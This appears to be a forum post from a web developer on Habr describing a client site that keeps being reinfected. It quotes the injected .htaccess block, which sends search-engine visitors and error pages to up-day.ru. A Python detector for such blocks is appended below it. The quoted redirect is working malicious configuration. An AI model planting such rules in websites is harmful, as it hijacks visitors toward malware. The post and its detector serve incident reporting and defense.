Good evening, dear Habr users!
I have an unpleasant situation. I built a site for a client. He is satisfied, and I received the money.
But a month later, I discovered that Avira antivirus starts complaining when I open the site. It says that the page is infected with WebGen. Looking through index.php, I found an iframe at the end of the file that downloads malicious code. It seemed to be a clear case: I disinfected my machine (Avira, Avast, then CureIt!) and changed the hosting password. I did not tell anyone the password.
A month passed, and I discovered something more interesting: when I visit the client's site, I am redirected to another site. I immediately went to FTP. index.php was untouched, but .htaccess looks quite predictable:
# HostRule
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule ^(.*)$ up-day.ru [R=301,L]
ErrorDocument 401 up-day.ru
ErrorDocument 403 up-day.ru
ErrorDocument 404 up-day.ru
ErrorDocument 500 up-day.ru
# /HostRule
I disinfect the machine (with the same antiviruses as listed above), change the password, and upload the old .htaccess. Everyone is happy. But no such luck. Less than 12 hours pass and I see the same picture again. Note that I did not tell anyone the password. I check the machine: everything is clean. I change the password again, for the third time. Less than half a day passes again and the site is infected. The client is in a panic, trust is lost.
But the problem is not solved. Maybe someone has faced this kind of infection, or has thoughts on this matter?
Perhaps I am not alone with this kind of problem?
In any case, I am thankful in advance to everyone who responds to my request for help.
PS I wrote to the registrar of up-day.ru. Will it do any good?
PPS Abuse replied that they only registered the name, and that I need to write to the hoster. I wrote and am waiting.
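An added example, not part of the original post: a small Python check that flags the two patterns visible in the injected block above, a redirect gated on the HTTP_REFERER and ErrorDocument entries that point away from the site. The function names and the abridged sample are constructed for illustration, and treating every target that is not an absolute local path as suspect is a heuristic assumption.

```python
import re

# Constructed sample: an abridged copy of the injected block shown in the post.
SAMPLE = """\
# HostRule
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule ^(.*)$ up-day.ru [R=301,L]
ErrorDocument 404 up-day.ru
# /HostRule
"""

REFERER_COND = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)", re.I)
REDIRECT_RULE = re.compile(r"^\s*RewriteRule\s+\S+\s+(\S+)\s+\[([^\]]*)\]", re.I)
ERROR_DOC = re.compile(r"^\s*ErrorDocument\s+(\d{3})\s+(\S+)", re.I)


def is_local(target):
    """Heuristic: absolute local paths, quoted messages, '-' and 'default' are benign."""
    return target.startswith(("/", '"')) or target in ("-", "default")


def scan_htaccess(text):
    """Return (line_no, reason) findings for referer-gated redirects and
    error pages that point away from the site."""
    findings = []
    pending = []  # line numbers of referer conditions awaiting their RewriteRule
    for no, line in enumerate(text.splitlines(), 1):
        if REFERER_COND.match(line):
            pending.append(no)
        elif m := REDIRECT_RULE.match(line):
            target, flags = m.group(1), m.group(2).upper()
            is_redirect = any(f.strip().startswith("R") for f in flags.split(","))
            if pending and is_redirect and not is_local(target):
                findings.append((no, f"referer-gated redirect to {target} "
                                     f"({len(pending)} conditions from line {pending[0]})"))
            pending = []  # conditions apply only to the next RewriteRule
        elif m := ERROR_DOC.match(line):
            if not is_local(m.group(2)):
                findings.append((no, f"ErrorDocument {m.group(1)} -> {m.group(2)}"))
    return findings


if __name__ == "__main__":
    for no, reason in scan_htaccess(SAMPLE):
        print(f"line {no}: {reason}")
```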